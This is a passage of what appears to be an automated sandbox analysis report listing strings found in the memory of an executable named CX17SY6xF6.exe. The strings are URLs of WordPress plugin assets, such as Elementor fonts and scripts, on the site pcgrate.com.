00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.ttf?5.10.0)
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff2?5.10.0)
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/eicons/fonts/eicons.woff?5.10.0)
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/brands.min.css?ver=5
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/font-awesome/css/fontawesome.min.css?
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/share-link/share-link.min.js?ver=3.3.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/swiper/swiper.min.js?ver=5.3.6
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/elementor/assets/lib/waypoints/waypoints.min.js?ver=4.0.2
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/css/email-subscribers-public
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/email-subscribers/lite/public/js/email-subscribers-public.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/css/fm-public.css?ver=1.
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/icons/line-awesome/css/l
                  Source: CX17SY6xF6.exe, 00000000.00000003.709726780.0000000004080000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.632675037.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.628353439.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.751280038.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.641204104.0000000003D00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.689396373.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.796233428.0000000001180000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.631568200.00000000047C0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.635219809.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.716616575.00000000038B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.714234066.0000000004660000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.623932255.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.593041864.0000000003AB0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.713334374.0000000005170000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.595870614.00000000037B0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000002.883743632.0000000004C00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.756364924.0000000004B00000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.633076695.00000000036A0000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.711533281.0000000005870000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.710627178.0000000004000000.00000004.00001000.00020000.00000000.sdmp, CX17SY6xF6.exe, 00000000.00000003.754365572.0000000004900000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://www.pcgrate.com/wp-content/plugins/feedback-modal-for-website/assets/js/fm-public.js?ver=1.0.
